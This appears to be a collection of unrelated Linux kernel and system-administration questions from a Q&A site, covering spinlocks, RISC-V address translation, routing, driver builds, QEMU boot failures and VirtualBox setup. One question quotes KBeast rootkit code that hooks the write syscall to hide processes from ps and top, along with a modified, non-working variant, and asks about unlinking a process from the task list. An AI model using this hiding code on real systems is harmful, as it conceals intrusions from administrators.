For the same computer, when the Linux operating system boots, is the executed instruction stream always the same? I guess it might be but I am not sure. Any help will be welcome!

Cheers,

There are many Q&As about spinlocks, but it's still confusing to me. I think it's because the questions and answers assume different settings or not clearly explain the settings about if it's SMP or if it's preemptive kernel or not when they ask or answer (and some old info is mixed in too).

My first question is: (Q1) in SMP situation, is schedule() run on every processor concurrently (I know the scheduling starts by jiffies timer interrupt)? I'll assume yes in my question below. I would appreciate it if someone could briefly explain it to me how processes move among processor cores during scheduling too.

I'm trying to understand how, why, when spin_lock/unlock_irqsave is used. Here is my question.

Suppose there is a code which calls spin_lock_irqsave, and the interrupt state (enable) was a 'disable' at the time of calling spin_lock_irqsave(). Could this code be running in interrupt context? Probably not, because the ISR should not have kicked in in the first place if interrupt was disabled in the corresponding local processor. Therefore, the code calling spin_lock_irqsave must be in process context. Ok, the interrupt had been disabled previously, but a process is trying to lock with spin_lock_irqsave.

In what case could the interrupt have been disabled? I think there are two cases.

Case 1: a previous interrupt routine had been preempted by this process (which is calling this spin_lock_irqsave). This is weird because ISR cannot be preempted. (Q2) By the way, in preemptive kernel, can ISR be preempted by a process? (Q3) I guess because the preempt_count() is #defined as (current_thread_info()->preempt_count), the preempt_disable only works for process and not interrupt. Do interrupts also have the current thread info?

Case 2: a previous normal process had acquired the lock with spin_lock_irq (or irqsave). But this also is weird because before locking, spin_lock_irq (or irqsave) disables preemption and interrupt for the task telling the scheduler not to switch to other task after the scheduler timer interrupt. So this case cannot be true.

I know I have to look further about process scheduling for SMP and kernel preemption, and maybe I am misunderstanding something. Could somebody clear things up in my question? Thanks a lot for reading.

I am running a simulated RV64GC core in QEMU and am trying to better understand the virtual memory subsystem and address translation process in RISC-V. My simulated system runs with OpenSBI, the Linux Kernal v5.5, and a minimal rootfs.

In QEMU debug traces, I see that sometimes (most commonly with ecalls) control is passed to the SBI and the addresses change from kernel (virtual?) addresses with an offset of 0xffffffe000000000 into something that looks like real, physical, addresses in RAM. For example,

...

0xffffffe00003a192: 00000073 ecall

...

IN: sbi_ecall_0_1_handler

0x0000000080004844: 00093603 ld a2,0(s2)

0x0000000080004848: 4785 addi a5,zero,1

0x000000008000484a: 00a797b3 sll a5,a5,a0

...

In the RISC-V privileged specification version 1.11, section 4.1.12, the satp CSR (control and state register) is defined to have a MODE field that determines address translation designation. A MODE of 0 means that translation is bare (addresses are considered physical), a MODE of 8 or 9 requires Sv39 or Sv48 page-based virtual addressing, respectively, and any other MODE values are reserved.

Now, both the RISC-V privileged and unprivileged specifications don't seem to mention when satp may be changed (other than with csrrw), so this leads me to the following questions:

When control is handed to the SBI (as with the ecall above), does the satp MODE change to 0? If yes, does this mean the satp mode should be reset on a u/s/mret instruction? Are there other instances (other than csrrw) where satp is supposed to change?

If not, is there some other mechanism by which the addresses are interpreted and designated as physical? Or are the addresses (the 0x80XXXXXX addresses above) instead considered virtual and should go through the usual virtual address translation process (as outlined in section 4.3.2 of the RISC-V privileged specification)? If this is the case, when are page table entries created for this?

I'm trying to learn how rootkit works (for educational purposes). I have the source code of Kbeast rootkit. To hide a process from the ps|| pstree etc. command it has the following function,

asmlinkage int h4x_write(unsigned int fd, const char __user *buf,size_t count){   int r;   char *kbuf=(char*)kmalloc(256,GFP_KERNEL);   copy_from_user(kbuf,buf,255);   if ((strstr(current->comm,"ps"))||(strstr(current->comm,"pstree"))||    (strstr(current->comm,"top"))||(strstr(current->comm,"lsof"))){        if(strstr(kbuf,_H4X0R_)||strstr(kbuf,KBEAST)){               kfree(kbuf);               return -ENOENT;        }   }   r=(*o_write)(fd,buf,count);   kfree(kbuf);   return r;}

This function override sys_call_table [__NR_write]. My understanding is *buf, contain the name of the process it is trying to hide. using copy_from_user(), buf is copied into a kernel buffer kbuf and then upon detecting the ps||pstree||... command using strstr(), it looks for the process_to_hide(H4X0R). It a match found then, free the kernel buffer kbuf. Is my understanding is correct?

I check the content of buf. It contains nothing, therefore it never works.

To make it work, I did a little workaround (not sure if this is the right approach, as I said I'm a beginner). I did the following, to put the process name (the process that I'm trying to hide) into the buf, then use copy_from_user() to copy it into the kernel space. I've a working code that looks like original Kbeast code,

const char *p_name="kbeast";asmlinkage long test_write(unsigned int fd, char const __user *buf, size_t count){long r=1;r = (*original_write)(fd, buf, count);char *kbuf=(char const *)kmalloc(256,GFP_KERNEL);//__copy_from_user(kbuf,buf,255);if (strstr(current->comm,"ps")){    struct task_struct *task;        for_each_process(task){        if (strstr(task->comm,p_name)){                //printk("%s [%d]\n",task->comm , task->pid);            buf=task->comm;            __copy_from_user(kbuf,buf,255);            break;        }    }           //printk(KERN_INFO "kBuf %s", kbuf);    if(strstr(kbuf,p_name)){            kfree(kbuf);            return -ENOENT;        }}return r;}

upon running the ps command, it shows the following,

 PID TTY          TIME CMD 10115 pts/2    00:00:00 bash 14560 pts/2    00:00:00 kbeast 14561 pts/2    00:00:00 ps ps: write error

What is happening here?

I was thinking another approach, as in task_struct link list contains all the process names, if I can somehow unlink the target process from task_struct that should do the trick, but I do not have any idea how to do that.

  eth0:  ip add add 172.18.13.222/21 dev eth0  ip add add 172.18.13.223/21 dev eth0  ip rule add from 172.18.13.222 lookup 100  ip route add default via 172.18.9.2 dev eth0   ip route add default via 172.18.8.1 dev eth0 table 100  two gateway:172.18.9.2(default) 172.18.8.1(PBR. It is routed to the source IP policy)  172.18.13.222 is first ip   172.18.13.223 is secondary ip  ping xxx #Does not work without specifying the source IP   Source IP is not specified:  ping packet->gw:172.18.9.2->xxx server(The policy route does not take effect)  ping -I 172.20.0.2 xxx #Specifies that the source IP works properly  Specify the source IP: ping packet->gw:172.18.8.1->xxx server(Policy routing takes effect)  curl xxxx #Specifies that the source IP works properly :curl(http packet)-->gw:172.18.8.1->http server (Policy routing takes effect)

Why is that?
Sorry, I don't know how to make the picture show directly

https://i.stack.imgur.com/UMc83.png

Can't install any linux driver (kde neon 5.18)

example:

root@Casual-PC:/home/casual/veikk-linux-driver# make all installmake -C /lib/modules/5.3.0-42-generic/buildM=/home/casual/veikk-linux-driver modules make[1]: Entering directory'/usr/src/linux-headers-5.3.0-42-generic'   Buildingmodules, stage 2.   MODPOST 1 modules make[1]: Leaving directory'/usr/src/linux-headers-5.3.0-42-generic' make -C/lib/modules/5.3.0-42-generic/build M=/home/casual/veikk-linux-drivermodules_install make[1]: Entering directory'/usr/src/linux-headers-5.3.0-42-generic'   INSTALL/home/casual/veikk-linux-driver/veikk.ko At main.c:160:- SSL error:02001002:system library:fopen:No such file or directory: ../crypto/bio/bss_file.c:72- SSL error:2006D080:BIO routines:BIO_new_file:no such file: ../crypto/bio/bss_file.c:79 sign-file: certs/signing_key.pem: No suchfile or directory   DEPMOD  5.3.0-42-generic Warning: modules_install:missing 'System.map' file. Skipping depmod. make[1]: Leavingdirectory '/usr/src/linux-headers-5.3.0-42-generic' modprobeveikk modprobe: FATAL: Module veikk not found in directory/lib/modules/5.3.0-42-generic Makefile:14: recipe for target'install' failed make: *** [install] Error 1 

I am trying to run a custom Linux kernel version 2.6.26 on QEMU with a busybox for i386 target but it fails at the end of the kernel booting with these two messages:

No filesystem could mount root, tried: reiserfs ext3 ext2 msdos vfat iso9660

Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(1,0)

I don't understand what i am skipping in my work to get into this but the steps i have made is as following:

I downloaded the Linux kernel source from the official site and build it with the following commands

make i386_defconfigmake CC="gcc" -j$(nproc)

And I wrote a simple script to build a root file system for the kernel using busybox 1.24.1

The script:

mkdir -p rootfscurr_location=$(pwd)cd rootfsmkdir -p bin boot dev etc lib proc root \sbin media sys tmp var usr etc/init.d \usr/bin usr/sbin usr/libecho "#!/bin/sh"> etc/init.d/rcSecho "PATH=/sbin:/bin:/usr/sbin:/usr/bin">> etc/init.d/rcSecho "export PATH">> etc/init.d/rcSecho "/bin/mount -t proc proc /proc">> etc/init.d/rcSecho "/bin/mount -t sysfs sysfs /sys">> etc/init.d/rcSecho "/sbin/mdev -s">> etc/init.d/rcSecho "/bin/hostname yahiafarghaly">> etc/init.d/rcSecho "/bin/echo ''">> etc/init.d/rcSecho "/bin/echo 'init.d is called!'">> etc/init.d/rcSecho "/bin/echo ''">> etc/init.d/rcSchmod +x etc/init.d/rcStouch etc/group etc/passwd etc/shadow etc/profileecho "root:x:0:"> etc/groupecho "root:x:0:0:root:/root:/bin/sh"> etc/passwdecho "root::10:0:0:0:::"> etc/shadowecho "export PS1='Shell$'"> etc/profileecho "export USER=`id -un`">> etc/profileecho "export HISTSIZE=1000">> etc/profileecho "echo 'Hello Sh !'">> etc/profileecho "echo """>> etc/profilebusybox_ver=1.24.1cd ~/P0/linux_study/busybox/busybox-$busybox_vermake defconfigmake CONFIG_STATIC=y \     CONFIG_EXTRA_CFLAGS="-m32 -march=i386" \     CONFIG_EXTRA_LDFLAGS="-m32" \     CONFIG_PREFIX=$curr_location/rootfs \     CC="gcc" -j$(nproc) installcd $curr_location/rootfsfind -print0 | cpio -0oH newc | gzip -9 > ../rootfs.img

So now, I have both the kernel and a file system image to have a fully boot to the linux shell.I have used the QEMU command as following:

   qemu-system-i386 \  -kernel ./kernel/kernel_image_2.6.26 \  -nographic \  -append "root=/dev/ram init=/sbin/init console=ttyS0 nokaslr" \  -initrd rootfs.img \  -m 512 \  --enable-kvm \  -cpu host

I don't know why QEMU cannot recognize the inital ram disk file. What am i missing ?

i got this error all over the place, i dont know what this error means so i also cant fix it.

ich benutzte Ubuntu 18.04 LTS

kernel: [4575051.649177] EXT4-fs error (device loop10): ext4_find_extent:913: inode #393377: comm systemd-journal: pblk 1611801 bad header/extent: invalid magic - magic 0, entries 0, max 0(0), depth 0(0)

I am developing a system monitoring tool in python that must have one of the functionalities of logging me into a system(specifically, my own linux mint system) on booting. Rather that having me to type the password, i want my program to do it on my voice command. But i couldn't figure out a way to access the password field on the login widget where i can ask my program to fill it in for me. How exactly should i design the system to support such functionality?

I have been trying to run Virtual Box on Ubuntu 18.04 but I keep getting an error.

Kernel driver not installed (rc=-1908)

The VirtualBox Linux kernel driver is either not loaded or not set up correctly. Please try setting it up again by executing

'/sbin/vboxconfig'

as root.

If your system has EFI Secure Boot enabled you may also need to sign the kernel modules (vboxdrv, vboxnetflt, vboxnetadp, vboxpci) before you can load them. Please see your Linux system's documentation for more information.

where: suplibOsInit what: 3 VERR_VM_DRIVER_NOT_INSTALLED (-1908) - The support driver is not installed. On linux, open returned ENOENT.

So I try running sudo /sbin/vboxconfig, i get the following errors:

sudo /sbin/vboxconfig[sudo] password for user: vboxdrv.sh: Stopping VirtualBox services.vboxdrv.sh: Starting VirtualBox services.vboxdrv.sh: Building VirtualBox kernel modules.This system is currently not set up to build kernel modules.Please install the Linux kernel "header" files matching the current kernelfor adding new hardware support to the system.The distribution packages containing the headers are probably:    linux-headers-generic linux-headers-4.18.12-041812-genericThis system is currently not set up to build kernel modules.Please install the Linux kernel "header" files matching the current kernelfor adding new hardware support to the system.The distribution packages containing the headers are probably:    linux-headers-generic linux-headers-4.18.12-041812-genericThere were problems setting up VirtualBox.  To re-start the set-up process, run  /sbin/vboxconfigas root.  If your system is using EFI Secure Boot you may need to sign thekernel modules (vboxdrv, vboxnetflt, vboxnetadp, vboxpci) before you can loadthem. Please see your Linux system's documentation for more information.

If I try installing the Linux headers I get:

sudo apt-get install linux-headers-$(uname -r)[sudo] password for user: Reading package lists... DoneBuilding dependency tree       Reading state information... DonePackage linux-headers-4.18.12-041812-generic is not available, but is referred to by another package.This may mean that the package is missing, has been obsoleted, oris only available from another sourceE: Package 'linux-headers-4.18.12-041812-generic' has no installation candidate

So how should I fix this so I can run Vbox? Should I upgrade my kernel?

Is there function like sprintf() in Linux Kernel (like printf()->printk())?

I am using HP laptop model: Omen dc-1093tx and I'm on linux operating system(POP-OS). I'm facing heating issues and fans are running on the minimum speed and I'm unable to boost fan speed manually.Can anyone help me with this??Any help will be appreciable.

This is my virt-managervirtio macvtap setting:

<interface type='direct' trustGuestRxFilters='yes'><mac address='52:54:00:b7:7d:c2'/><source dev='eth20' mode='passthrough'/><model type='virtio'/><driver name='vhost' queues='4'/><address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/></interface>

Because multiple RX-Queues are supported, I am wondering whether it is possible to do Receive Side Steering. This means I am basically able to tell the NIC where I want specific packets to arrive, such as

ethtool -N eth1 flow-type udp4 dst-ip 10.1.1.1 action 0

which would send all packets with dst-ip 10.1.1.1 on RX-Queue 0. But if I try to set a ethtool rule I get this error:

rxclass: Cannot get RX class rule count: Operation not supported

In my opinion it doesn't really make sense to enable multiqueue without flow steering because otherwise it is not possible to do performant load distribution on multiple CPUs.

task_struct is used to store the status of CPU and trap frame does the same thing so how they differ? And trap frame is a data struct or a just and concept?

I was reading the MDS attack paper RIDL: Rogue In-Flight Data Load. The set pages as write-back, write-through, write-combined or uncacheable and with different experiments determines that the Line Fill Buffer is the cause of the micro-architectural leaks.

On a tangent: I was aware that memory can be uncacheable, but I assumed that cacheable data was always cached in a write-back cache, i.e. I assumed that the L1, L2 and LLC were always write-back caches.

I read up on the differences between write-back and write-through caches in my Computer Architecture book. It says:

Write-through caches are simpler to implement and can use a write buffer that works independently of the cache to update memory. Furthermore, read misses are less expensive because they do not trigger a memory write. On the other hand, write-back caches result in fewer transfers, which allows more bandwidth to memory for I/O devices that perform DMA. Further, reducing the number of transfers becomes increasingly important as we move down the hierarchy and the transfer times increase. In general, caches further down the hierarchy are more likely to use write-back than write-through.

So a write-through cache is simpler to implement. I can see how that can be an advantage. But if the caching policy is settable by the page table attributes then there can't be an implementation advantage - every cache needs to be able to work in either write-back or write-through.

Questions

1. Can every cache (L1, L2, LLC) work in either write-back or write-through mode? So if the page attribute is set to write-through, then they all will be write-through?
2. Write combining is useful for GPU memory; Uncacheable is good when accessing hardware registers. When should a page be set to write-through? What are the advantages to that?
3. Are there any write-through caches (if it really is a property of the hardware and not just something that is controlled by the pagetable attributes) or is the trend that all caches are created as write-back to reduce traffic?

I'm interested in using netlink for a straightforward application (reading cgroup stats at high frequency).

The man page cautions that the protocol is not reliable, hinting that the application needs to be prepared to handle dropped packets:

However, reliable transmissions from kernel to user are impossible in any case. The kernel can't send a netlink message if the socket buffer is full: the message will be dropped and the kernel and the user-space process will no longer have the same view of kernel state. It is up to the application to detect when this happens (via the ENOBUFS error returned by recvmsg(2)) and resynchronize.

Since my requirements are simple, I'm fine with just destroying the socket and creating a new one whenever anything unexpected happens. But I can't find any documentation on what the expectations are on my program—the man page for recvmsg(2) doesn't even mention ENOBUFS for example.

What all do I need to worry about in order to make sure I can tell that a request from my application or a response from the kernel has been dropped, so that I can reset everything and start over? It's clear to me that I could do so whenever I receive an error from any of the syscalls involved, but for example what happens if my request is dropped on the way to the kernel? Will I just never receive a response? Do I need to build a timeout mechanism where I wait only so long for a response?

I am working on a kernel driver for an embedded project using a serial communication.I would like to test if enabling low latency on on serial port the performance could improve.

Setting bit ASYNC_LOW_LATENCY in serial_struct flags field and calling TIOCSSERIAL ioctl function results in error:

-22 EINVAL

Is there anything I am missing?

Something in kernel config?

Can someone explain about rbin memory in android kernel? Anything would be helpful. I am new to kernel system and trying to understand the memory management concept where we reserve some memory for specific processes like camera. Also please give some direction where I can learn more about this. Any help will be much appreciated.Can you please tell where can I learn about RBIN? Please it's really urgent.

I need information about following block(disk I/O) events available in perf. Can you tell me where will I get detail information about each event?

  block:block_bio_backmerge                            block:block_bio_bounce                              block:block_bio_complete                            block:block_bio_frontmerge                           block:block_bio_queue                                block:block_bio_remap                              block:block_dirty_buffer                             block:block_getrq                                  block:block_plug                                    block:block_rq_complete                             block:block_rq_insert                               block:block_rq_issue                                block:block_rq_remap                                 block:block_rq_requeue                               block:block_sleeprq                                  block:block_split                                   block:block_touch_buffer                             block:block_unplug

Please help me with this.

I am dual booting ubuntu 18.04.4 on my lenovo g5070 along with my windows 8.1.

I am getting error 'unable to find a medium containing a live file system'.

I checked the checksum of downloaded iso file.

I am using bootable pendrive.